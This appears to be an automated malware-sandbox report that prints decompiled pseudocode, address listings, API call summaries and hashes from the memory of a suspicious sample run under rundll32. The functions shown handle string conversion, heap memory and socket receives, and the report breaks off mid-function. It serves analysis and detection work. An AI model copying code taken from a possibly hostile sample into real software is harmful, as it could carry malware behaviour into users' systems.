                                                                                              									goto L37;
                                                                                              								} else {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              							}
                                                                                              							_t90 = _t96 + 8;
                                                                                              							__eflags = _t96 - _t90;
                                                                                              							asm("sbb eax, eax");
                                                                                              							_t66 = _t60 & _t90;
                                                                                              							_t87 = _t96 + 8;
                                                                                              							__eflags = _t66 - 0x400;
                                                                                              							if(_t66 > 0x400) {
                                                                                              								__eflags = _t96 - _t87;
                                                                                              								asm("sbb eax, eax");
                                                                                              								_t101 = E042884E7(_t87, _t66 & _t87);
                                                                                              								_pop(_t87);
                                                                                              								__eflags = _t101;
                                                                                              								if(_t101 == 0) {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              								 *_t101 = 0xdddd;
                                                                                              								L28:
                                                                                              								_t101 =  &(_t101[4]);
                                                                                              								goto L30;
                                                                                              							}
                                                                                              							__eflags = _t96 - _t87;
                                                                                              							asm("sbb eax, eax");
                                                                                              							E04291860();
                                                                                              							_t101 = _t107;
                                                                                              							__eflags = _t101;
                                                                                              							if(_t101 == 0) {
                                                                                              								goto L35;
                                                                                              							}
                                                                                              							 *_t101 = 0xcccc;
                                                                                              							goto L28;
                                                                                              						}
                                                                                              						_t70 = _a28;
                                                                                              						if(_t70 == 0) {
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						_t125 = _t105 - _t70;
                                                                                              						if(_t105 > _t70) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						_t71 = E04289282(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                              						_t105 = _t71;
                                                                                              						if(_t71 != 0) {
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						goto L36;
                                                                                              					}
                                                                                              					asm("sbb eax, eax");
                                                                                              					_t72 = _t54 & _t95 + 0x00000008;
                                                                                              					_t85 = _t95 + 8;
                                                                                              					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                              						__eflags = _t95 - _t85;
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t81 = E042884E7(_t85, _t72 & _t85);
                                                                                              						_pop(_t85);
                                                                                              						__eflags = _t81;
                                                                                              						if(__eflags == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						 *_t81 = 0xdddd;
                                                                                              						L12:
                                                                                              						_t81 =  &(_t81[4]);
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					asm("sbb eax, eax");
                                                                                              					E04291860();
                                                                                              					_t81 = _t107;
                                                                                              					if(_t81 == 0) {
                                                                                              						goto L36;
                                                                                              					}
                                                                                              					 *_t81 = 0xcccc;
                                                                                              					goto L12;
                                                                                              				}
                                                                                              			}


























                                                                                              0x0428c4bd
                                                                                              0x0428c4be
                                                                                              0x0428c4bf
                                                                                              0x0428c4c6
                                                                                              0x0428c4ca
                                                                                              0x0428c4cb
                                                                                              0x0428c4d1
                                                                                              0x0428c4d7
                                                                                              0x0428c4dd
                                                                                              0x0428c4e0
                                                                                              0x0428c4e0
                                                                                              0x0428c4e3
                                                                                              0x0428c4e5
                                                                                              0x0428c4e5
                                                                                              0x0428c4e3
                                                                                              0x0428c4e7
                                                                                              0x0428c4ec
                                                                                              0x0428c4f3
                                                                                              0x0428c4f6
                                                                                              0x0428c4f6
                                                                                              0x0428c512
                                                                                              0x0428c518
                                                                                              0x0428c51d
                                                                                              0x0428c6b0
                                                                                              0x0428c6c3
                                                                                              0x0428c523
                                                                                              0x0428c523
                                                                                              0x0428c526
                                                                                              0x0428c52b
                                                                                              0x0428c52f
                                                                                              0x0428c583
                                                                                              0x0428c583
                                                                                              0x0428c585
                                                                                              0x0428c587
                                                                                              0x0428c6a5
                                                                                              0x0428c6a5
                                                                                              0x0428c6a7
                                                                                              0x0428c6a8
                                                                                              0x00000000
                                                                                              0x0428c6ae
                                                                                              0x0428c598
                                                                                              0x0428c59e
                                                                                              0x0428c5a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c5a6
                                                                                              0x0428c5b8
                                                                                              0x0428c5bd
                                                                                              0x0428c5c1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c5ce
                                                                                              0x0428c608
                                                                                              0x0428c60b
                                                                                              0x0428c60e
                                                                                              0x0428c610
                                                                                              0x0428c612
                                                                                              0x0428c614
                                                                                              0x0428c660
                                                                                              0x0428c660
                                                                                              0x0428c662
                                                                                              0x0428c662
                                                                                              0x0428c664
                                                                                              0x0428c69e
                                                                                              0x0428c69f
                                                                                              0x00000000
                                                                                              0x0428c6a4
                                                                                              0x0428c678
                                                                                              0x0428c67d
                                                                                              0x0428c67f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c683
                                                                                              0x0428c684
                                                                                              0x0428c685
                                                                                              0x0428c688
                                                                                              0x0428c6c4
                                                                                              0x0428c6c7
                                                                                              0x0428c68a
                                                                                              0x0428c68a
                                                                                              0x0428c68b
                                                                                              0x0428c68b
                                                                                              0x0428c698
                                                                                              0x0428c69a
                                                                                              0x0428c69c
                                                                                              0x0428c6cd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c69c
                                                                                              0x0428c616
                                                                                              0x0428c619
                                                                                              0x0428c61b
                                                                                              0x0428c61d
                                                                                              0x0428c61f
                                                                                              0x0428c622
                                                                                              0x0428c627
                                                                                              0x0428c642
                                                                                              0x0428c644
                                                                                              0x0428c64e
                                                                                              0x0428c650
                                                                                              0x0428c651
                                                                                              0x0428c653
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c655
                                                                                              0x0428c65b
                                                                                              0x0428c65b
                                                                                              0x00000000
                                                                                              0x0428c65b
                                                                                              0x0428c629
                                                                                              0x0428c62b
                                                                                              0x0428c62f
                                                                                              0x0428c634
                                                                                              0x0428c636
                                                                                              0x0428c638
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c63a
                                                                                              0x00000000
                                                                                              0x0428c63a
                                                                                              0x0428c5d0
                                                                                              0x0428c5d5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c5db
                                                                                              0x0428c5dd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c5f4
                                                                                              0x0428c5f9
                                                                                              0x0428c5fd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c603
                                                                                              0x0428c536
                                                                                              0x0428c538
                                                                                              0x0428c53a
                                                                                              0x0428c542
                                                                                              0x0428c561
                                                                                              0x0428c563
                                                                                              0x0428c56d
                                                                                              0x0428c56f
                                                                                              0x0428c570
                                                                                              0x0428c572
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c578
                                                                                              0x0428c57e
                                                                                              0x0428c57e
                                                                                              0x00000000
                                                                                              0x0428c57e
                                                                                              0x0428c546
                                                                                              0x0428c54a
                                                                                              0x0428c54f
                                                                                              0x0428c553
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428c559
                                                                                              0x00000000
                                                                                              0x0428c559

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,04287F57,04287F57,?,?,?,0428C709,00000001,00000001,44E85006), ref: 0428C512
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0428C709,00000001,00000001,44E85006,?,?,?), ref: 0428C598
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,44E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0428C692
                                                                                              • __freea.LIBCMT ref: 0428C69F
                                                                                                • Part of subcall function 042884E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04288519
                                                                                              • __freea.LIBCMT ref: 0428C6A8
                                                                                              • __freea.LIBCMT ref: 0428C6CD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 7ea7faf004d2be5f603e7c8e67101aac5b03cbf876915fb37f0e7fad5c91876d
                                                                                              • Instruction ID: 97ee0a2ac514632262d7845f7f4b08d3697d7a701e16776c544948bdbf068ade
                                                                                              • Opcode Fuzzy Hash: 7ea7faf004d2be5f603e7c8e67101aac5b03cbf876915fb37f0e7fad5c91876d
                                                                                              • Instruction Fuzzy Hash: 1F51B272731226ABEB25AE65CC44EBF77A9EB84764F15463CFC04D6180EB74EC90C660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04273680(void* __ecx, intOrPtr _a8, void* _a12, signed int _a16, intOrPtr _a20) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t26;
                                                                                              				void* _t28;
                                                                                              				long _t29;
                                                                                              				void* _t30;
                                                                                              				intOrPtr _t32;
                                                                                              				void* _t37;
                                                                                              				long _t49;
                                                                                              				void* _t54;
                                                                                              				signed int _t56;
                                                                                              				long _t58;
                                                                                              				void* _t68;
                                                                                              				void* _t70;
                                                                                              				void* _t77;
                                                                                              				void* _t81;
                                                                                              
                                                                                              				_t26 = _a20;
                                                                                              				_t54 = __ecx;
                                                                                              				if(_t26 == 0) {
                                                                                              					_t56 = _a16;
                                                                                              					_t70 = _a12;
                                                                                              					if(_t56 != 0 ||  *((intOrPtr*)(_t70 + 0x18)) == 2) {
                                                                                              						 *(_t70 + 0x1c) = _t56;
                                                                                              						_t28 =  *((intOrPtr*)(_t70 + 0x18)) - 2;
                                                                                              						if(_t28 == 0) {
                                                                                              							_t29 = E04273800(_t54, _t54, _t68, _t70, _t77, _t56, _a8, _t70);
                                                                                              							goto L23;
                                                                                              						}
                                                                                              						_t30 = _t28 - 1;
                                                                                              						if(_t30 == 0) {
                                                                                              							_t58 =  ~_t56;
                                                                                              							_t32 =  *((intOrPtr*)(_t54 + 8));
                                                                                              							if(_t32 == 0) {
                                                                                              								_t24 = _a8 + 0x44; // 0x44
                                                                                              								InterlockedExchangeAdd(_t24, _t58);
                                                                                              								E04272150(_t54, _a8, _t70);
                                                                                              								return E042747C0(_t54, _t54, _t68, _t70, _a8, _t78);
                                                                                              							} else {
                                                                                              								_t37 = _t32 - 1;
                                                                                              								if(_t37 == 0) {
                                                                                              									_t22 = _a8 + 0x44; // 0x44
                                                                                              									InterlockedExchangeAdd(_t22, _t58);
                                                                                              									E04272150(_t54, _a8, _t70);
                                                                                              									return E04274900(_t54, _t54, _t68, _t70, _a8, _t79);
                                                                                              								} else {
                                                                                              									_t29 = _t37 - 1;
                                                                                              									if(_t29 != 0) {
                                                                                              										goto L23;
                                                                                              									}
                                                                                              									_t20 = _a8 + 0x40; // 0x40
                                                                                              									InterlockedExchangeAdd(_t20, _t58);
                                                                                              									return E04272150(_t54, _a8, _t70);
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t29 = _t30 - 1;
                                                                                              							if(_t29 != 0) {
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							return E042738F0(_t54, _t56, _a8, _t70);
                                                                                              						}
                                                                                              					} else {
                                                                                              						E04272920(__ecx, _a8, 1, 0, 0);
                                                                                              						_t29 = E0426C930(_t54 + 0xb0, _t70);
                                                                                              						if(_t29 != 0) {
                                                                                              							L23:
                                                                                              							return _t29;
                                                                                              						}
                                                                                              						return HeapFree( *( *(_t70 + 0x14)), _t29, _t70);
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t81 = _a12;
                                                                                              					if(_t26 != 0x2736 && _t26 != 0x3e3) {
                                                                                              						E04272920(__ecx, _a8, 2,  *((intOrPtr*)(_t81 + 0x18)), _t26);
                                                                                              					}
                                                                                              					if( *((intOrPtr*)(_t81 + 0x18)) != 3) {
                                                                                              						L6:
                                                                                              						_t49 = E0426C930(_t54 + 0xb0, _t81);
                                                                                              						if(_t49 != 0) {
                                                                                              							goto L24;
                                                                                              						} else {
                                                                                              							return HeapFree( *( *(_t81 + 0x14)), _t49, _t81);
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t49 = InterlockedDecrement(_t81 + 0x28);
                                                                                              						if(_t49 != 0) {
                                                                                              							L24:
                                                                                              							return _t49;
                                                                                              						} else {
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}




















                                                                                              0x04273683
                                                                                              0x04273687
                                                                                              0x0427368c
                                                                                              0x042736ec
                                                                                              0x042736f0
                                                                                              0x042736f5
                                                                                              0x04273738
                                                                                              0x0427373b
                                                                                              0x0427373e
                                                                                              0x042737ea
                                                                                              0x00000000
                                                                                              0x042737ea
                                                                                              0x04273744
                                                                                              0x04273747
                                                                                              0x04273768
                                                                                              0x0427376a
                                                                                              0x0427376d
                                                                                              0x042737c1
                                                                                              0x042737c5
                                                                                              0x042737cf
                                                                                              0x042737e0
                                                                                              0x0427376f
                                                                                              0x0427376f
                                                                                              0x04273772
                                                                                              0x0427379b
                                                                                              0x0427379f
                                                                                              0x042737a9
                                                                                              0x042737ba
                                                                                              0x04273774
                                                                                              0x04273774
                                                                                              0x04273777
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0427377d
                                                                                              0x04273781
                                                                                              0x04273794
                                                                                              0x04273794
                                                                                              0x04273772
                                                                                              0x04273749
                                                                                              0x04273749
                                                                                              0x0427374c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04273762
                                                                                              0x04273762
                                                                                              0x042736fd
                                                                                              0x04273708
                                                                                              0x04273714
                                                                                              0x0427371b
                                                                                              0x042737ef
                                                                                              0x00000000
                                                                                              0x042737ef
                                                                                              0x04273732
                                                                                              0x04273732
                                                                                              0x0427368e
                                                                                              0x0427368e
                                                                                              0x04273696
                                                                                              0x042736a8
                                                                                              0x042736a8
                                                                                              0x042736b1
                                                                                              0x042736c5
                                                                                              0x042736cc
                                                                                              0x042736d3
                                                                                              0x00000000
                                                                                              0x042736d9
                                                                                              0x042736e9
                                                                                              0x042736e9
                                                                                              0x042736b3
                                                                                              0x042736b7
                                                                                              0x042736bf
                                                                                              0x042737f3
                                                                                              0x042737f3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042736bf
                                                                                              0x042736b1

                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 042736B7
                                                                                              • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,?,04273568,?,?,?,?,00000000), ref: 042736E0
                                                                                                • Part of subcall function 04272920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04272959
                                                                                                • Part of subcall function 04272920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0427295F
                                                                                              • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000001,00000000,00000000,?,?,00000000,?,04273568,?,?,?), ref: 04273728
                                                                                              • InterlockedExchangeAdd.KERNEL32(00000040,?), ref: 04273781
                                                                                                • Part of subcall function 04272150: SetLastError.KERNEL32(00000000,?,00000000,?,?,?,042737D4,00000000,?,?,04273568,?,?,?,?,00000000), ref: 0427216D
                                                                                                • Part of subcall function 04272150: InterlockedDecrement.KERNEL32(00000028), ref: 042721E6
                                                                                                • Part of subcall function 04272150: HeapFree.KERNEL32(?,00000000,00000000,00000000,?,042737D4,00000000,?,?,04273568,?,?,?,?,00000000), ref: 04272207
                                                                                              • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 0427379F
                                                                                              • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 042737C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Interlocked$ExchangeFreeHeap$CriticalDecrementEnterSection$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1561599947-0
                                                                                              • Opcode ID: df91d5dfe567b314e0fd2a95037876bb13468a8e19b141337cfe0a87419cc35b
                                                                                              • Instruction ID: cd31c00c27e4e342efbfeb9a376a5e82e84862f7237663eee4e5d674d224404c
                                                                                              • Opcode Fuzzy Hash: df91d5dfe567b314e0fd2a95037876bb13468a8e19b141337cfe0a87419cc35b
                                                                                              • Instruction Fuzzy Hash: 9241B373320115ABDB24EFA9EC88E9B77ACFB85321B00016AFA02D7551CA32F854D764
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 23%
                                                                                              			E042756C0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* _a4, intOrPtr* _a8) {
                                                                                              				signed int _v8;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				void* _v20;
                                                                                              				intOrPtr* _v24;
                                                                                              				void* _v28;
                                                                                              				intOrPtr* _v32;
                                                                                              				signed int _t40;
                                                                                              				intOrPtr _t42;
                                                                                              				long _t45;
                                                                                              				intOrPtr _t51;
                                                                                              				intOrPtr _t53;
                                                                                              				void* _t56;
                                                                                              				intOrPtr _t57;
                                                                                              				intOrPtr _t58;
                                                                                              				intOrPtr _t60;
                                                                                              				void* _t64;
                                                                                              				intOrPtr* _t65;
                                                                                              				intOrPtr* _t74;
                                                                                              				void* _t75;
                                                                                              				void* _t77;
                                                                                              				void* _t81;
                                                                                              				intOrPtr* _t82;
                                                                                              				struct _CRITICAL_SECTION* _t83;
                                                                                              				signed int _t84;
                                                                                              
                                                                                              				_t65 = __ecx;
                                                                                              				_t40 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t40 ^ _t84;
                                                                                              				_t81 = _a4;
                                                                                              				_t64 = __edx;
                                                                                              				_t74 = _a8;
                                                                                              				_t77 = 0;
                                                                                              				_v24 = __ecx;
                                                                                              				_v20 = _t81;
                                                                                              				_v32 = _t74;
                                                                                              				_v28 = 0;
                                                                                              				while( *((intOrPtr*)(_t64 + 0x4c)) == 0) {
                                                                                              					_t51 =  *_t74;
                                                                                              					if(_t51 == 0 || _t51 == 1) {
                                                                                              						_t82 = _t81 + 0x1c;
                                                                                              						_t53 =  *((intOrPtr*)( *_t65 + 0xcc))();
                                                                                              						_t77 = 0;
                                                                                              						 *_t82 = _t53;
                                                                                              						_v16 = 0;
                                                                                              						_v12 = 0;
                                                                                              						_t56 = _v20;
                                                                                              						__imp__WSARecv( *((intOrPtr*)(_t56 + 0x34)), _t82, 1,  &_v12,  &_v16, 0, 0);
                                                                                              						if(_t56 != 0xffffffff) {
                                                                                              							_t57 = _v12;
                                                                                              							if(_t57 == 0) {
                                                                                              								_t77 = 0x2775;
                                                                                              								goto L9;
                                                                                              							} else {
                                                                                              								 *_t82 = _t57;
                                                                                              								goto L10;
                                                                                              							}
                                                                                              						} else {
                                                                                              							__imp__#111();
                                                                                              							_t77 = _t56;
                                                                                              							L9:
                                                                                              							if(_t77 != 0) {
                                                                                              								_t65 = _v24;
                                                                                              								_t81 = _v20;
                                                                                              								_t74 = _v32;
                                                                                              							} else {
                                                                                              								L10:
                                                                                              								_t58 = 0xff;
                                                                                              								_v12 = 0xff;
                                                                                              								if( *((intOrPtr*)(_t64 + 0x30)) != 0) {
                                                                                              									_t83 = _t64 + 0x54;
                                                                                              									EnterCriticalSection(_t83);
                                                                                              									if( *((intOrPtr*)(_t64 + 0x30)) != 0) {
                                                                                              										SetLastError(0);
                                                                                              										_t75 = _v20;
                                                                                              										_v12 =  *((intOrPtr*)( *_v24 + 0xe8))(_t64,  *((intOrPtr*)(_t75 + 0x20)),  *((intOrPtr*)(_t75 + 0x1c)));
                                                                                              									}
                                                                                              									LeaveCriticalSection(_t83);
                                                                                              									_t58 = _v12;
                                                                                              								}
                                                                                              								_t74 = _v32;
                                                                                              								_t65 = _v24;
                                                                                              								_t81 = _v20;
                                                                                              								 *_t74 = _t58;
                                                                                              								_t60 = _v28 + 1;
                                                                                              								_v28 = _t60;
                                                                                              								if(_t60 < 0x1e) {
                                                                                              									continue;
                                                                                              								} else {
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					break;
                                                                                              				}
                                                                                              				_t42 =  *_t74;
                                                                                              				if(_t42 == 0 || _t42 == 1) {
                                                                                              					if(_t77 == 0 || _t77 == 0x2733) {
                                                                                              						return E04275AFE(_v8 ^ _t84);
                                                                                              					} else {
                                                                                              						if(_t77 != 0x2775) {
                                                                                              							if(_t77 != 0x2736 && _t77 != 0x3e3) {
                                                                                              								_push(_t77);
                                                                                              								_push(4);
                                                                                              								_push(2);
                                                                                              								goto L26;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(1);
                                                                                              							L26:
                                                                                              							_push(_t64);
                                                                                              							E04272920(_t65);
                                                                                              						}
                                                                                              						_t45 = E0426C930(_v24 + 0xb0, _t81);
                                                                                              						if(_t45 == 0) {
                                                                                              							HeapFree( *( *(_t81 + 0x14)), _t45, _t81);
                                                                                              						}
                                                                                              						goto L29;
                                                                                              					}
                                                                                              				} else {
                                                                                              					L29:
                                                                                              					return E04275AFE(_v8 ^ _t84);
                                                                                              				}
                                                                                              			}




























                                                                                              0x042756c0
                                                                                              0x042756c6
                                                                                              0x042756cd
                                                                                              0x042756d2
                                                                                              0x042756d5
                                                                                              0x042756d7
                                                                                              0x042756db
                                                                                              0x042756dd
                                                                                              0x042756e0
                                                                                              0x042756e3
                                                                                              0x042756e6
                                                                                              0x042756f0
                                                                                              0x042756fa
                                                                                              0x042756fe
                                                                                              0x0427570b
                                                                                              0x0427570e
                                                                                              0x04275714
                                                                                              0x04275716
                                                                                              0x0427571d
                                                                                              0x04275724
                                                                                              0x04275728
                                                                                              0x04275731
                                                                                              0x0427573a
                                                                                              0x04275746
                                                                                              0x0427574b
                                                                                              0x04275751
                                                                                              0x00000000
                                                                                              0x0427574d
                                                                                              0x0427574d
                                                                                              0x00000000
                                                                                              0x0427574d
                                                                                              0x0427573c
                                                                                              0x0427573c
                                                                                              0x04275742
                                                                                              0x04275756
                                                                                              0x04275758
                                                                                              0x042757bf
                                                                                              0x042757c2
                                                                                              0x042757c5
                                                                                              0x0427575a
                                                                                              0x0427575a
                                                                                              0x0427575e
                                                                                              0x04275763
                                                                                              0x04275766
                                                                                              0x04275768
                                                                                              0x0427576c
                                                                                              0x04275776
                                                                                              0x0427577a
                                                                                              0x04275780
                                                                                              0x04275795
                                                                                              0x04275795
                                                                                              0x04275799
                                                                                              0x0427579f
                                                                                              0x0427579f
                                                                                              0x042757a2
                                                                                              0x042757a5
                                                                                              0x042757a8
                                                                                              0x042757ab
                                                                                              0x042757b0
                                                                                              0x042757b1
                                                                                              0x042757b7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042757bd
                                                                                              0x042757b7
                                                                                              0x04275758
                                                                                              0x0427573a
                                                                                              0x00000000
                                                                                              0x042756fe
                                                                                              0x042757c8
                                                                                              0x042757cc
                                                                                              0x042757d5
                                                                                              0x04275852
                                                                                              0x042757df
                                                                                              0x042757e5
                                                                                              0x042757f5
                                                                                              0x042757ff
                                                                                              0x04275800
                                                                                              0x04275802
                                                                                              0x00000000
                                                                                              0x04275802
                                                                                              0x042757e7
                                                                                              0x042757e7
                                                                                              0x042757e9
                                                                                              0x042757eb
                                                                                              0x04275804
                                                                                              0x04275804
                                                                                              0x04275805
                                                                                              0x04275805
                                                                                              0x04275814
                                                                                              0x0427581b
                                                                                              0x04275824
                                                                                              0x04275824
                                                                                              0x00000000
                                                                                              0x0427581b
                                                                                              0x0427582a
                                                                                              0x0427582a
                                                                                              0x0427583c
                                                                                              0x0427583c

                                                                                              APIs
                                                                                              • WSARecv.WS2_32(?,-0000001B,00000001,00000001,?,00000000,00000000), ref: 04275731
                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,00000001,00000000,?,?,?,042729B2), ref: 0427573C
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0427576C
                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,?,?,?,042729B2), ref: 0427577A
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04275799
                                                                                              • HeapFree.KERNEL32(?,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000001,00000000,?,?), ref: 04275824
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveRecv
                                                                                              • String ID:
                                                                                              • API String ID: 4219686125-0
                                                                                              • Opcode ID: 6e6c51d643aa2836410f4b7c8741635e2bd632a7dc4558350fbd5f4902e705bd
                                                                                              • Instruction ID: 3979b915a2f7006f410909f75621f229a1568f487f4f29de76db80958c7c3fe4
                                                                                              • Opcode Fuzzy Hash: 6e6c51d643aa2836410f4b7c8741635e2bd632a7dc4558350fbd5f4902e705bd
                                                                                              • Instruction Fuzzy Hash: B7518475B10205EFDB10DF59D884BAEF7B9FF49310F1445A9E809A7680DB34A981CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 16%
                                                                                              			E0426F190(void* __ebx, void* __edi, intOrPtr* _a4) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				char _v24;
                                                                                              				long _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _v52;
                                                                                              				signed int _v56;
                                                                                              				signed int _v68;
                                                                                              				char _v112;
                                                                                              				intOrPtr _v132;
                                                                                              				signed int _t98;
                                                                                              				intOrPtr _t121;
                                                                                              				signed int _t123;
                                                                                              				char* _t125;
                                                                                              				intOrPtr _t130;
                                                                                              				intOrPtr _t133;
                                                                                              				intOrPtr _t135;
                                                                                              				long _t137;
                                                                                              				signed char _t138;
                                                                                              				intOrPtr _t140;
                                                                                              				long _t141;
                                                                                              				intOrPtr _t154;
                                                                                              				intOrPtr _t157;
                                                                                              				intOrPtr* _t159;
                                                                                              				intOrPtr* _t161;
                                                                                              				intOrPtr* _t184;
                                                                                              				long _t185;
                                                                                              				signed char _t190;
                                                                                              				void* _t191;
                                                                                              				intOrPtr* _t192;
                                                                                              				intOrPtr* _t194;
                                                                                              				intOrPtr* _t197;
                                                                                              				signed int _t201;
                                                                                              				signed int _t202;
                                                                                              				signed int _t204;
                                                                                              
                                                                                              				_t98 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t98 ^ _t201;
                                                                                              				_t192 = _a4;
                                                                                              				GetCurrentThreadId();
                                                                                              				_t159 = _t192;
                                                                                              				 *((intOrPtr*)( *_t192 + 0xc0))(GetCurrentThreadId(), __edi, _t191, __ebx);
                                                                                              				_t154 =  *((intOrPtr*)(_t192 + 0x2c));
                                                                                              				_v24 =  *((intOrPtr*)(_t192 + 0x20));
                                                                                              				_v20 =  *((intOrPtr*)(_t192 + 0x174));
                                                                                              				_v16 =  *((intOrPtr*)(_t192 + 0x178));
                                                                                              				_v12 =  *((intOrPtr*)(_t192 + 0x17c));
                                                                                              				_t107 =  *(_t192 + 0x5c);
                                                                                              				_v28 = 1;
                                                                                              				if( *(_t192 + 0x5c) != 0) {
                                                                                              					L0427ED17(_t107);
                                                                                              					_t204 = _t204 + 4;
                                                                                              					 *(_t192 + 0x5c) = 0;
                                                                                              					 *(_t192 + 0x60) = 0;
                                                                                              					 *(_t192 + 0x64) = 0;
                                                                                              				}
                                                                                              				E0425ADA0(_t192 + 0x5c, _t154, _t159, 0);
                                                                                              				_t161 = _t192;
                                                                                              				if( *((intOrPtr*)( *_t192 + 0x24))() == 0) {
                                                                                              					L18:
                                                                                              					 *((intOrPtr*)( *_t192 + 0xc4))(GetCurrentThreadId());
                                                                                              					if(_v28 != 0 &&  *((intOrPtr*)( *_t192 + 0x24))() != 0) {
                                                                                              						 *((intOrPtr*)( *_t192 + 4))();
                                                                                              					}
                                                                                              					GetCurrentThreadId();
                                                                                              					return E04275AFE(_v8 ^ _t201);
                                                                                              				} else {
                                                                                              					_t184 = __imp__WSAWaitForMultipleEvents;
                                                                                              					do {
                                                                                              						_t121 =  *_t184(4,  &_v24, 0, 0xffffffff, 0);
                                                                                              						if(_t121 != 0) {
                                                                                              							if(_t121 != 1) {
                                                                                              								if(_t121 == 2) {
                                                                                              									_v28 = 0;
                                                                                              									goto L18;
                                                                                              								} else {
                                                                                              									if(_t121 != 3) {
                                                                                              										if(_t121 != 0xffffffff) {
                                                                                              											E04257AC0();
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
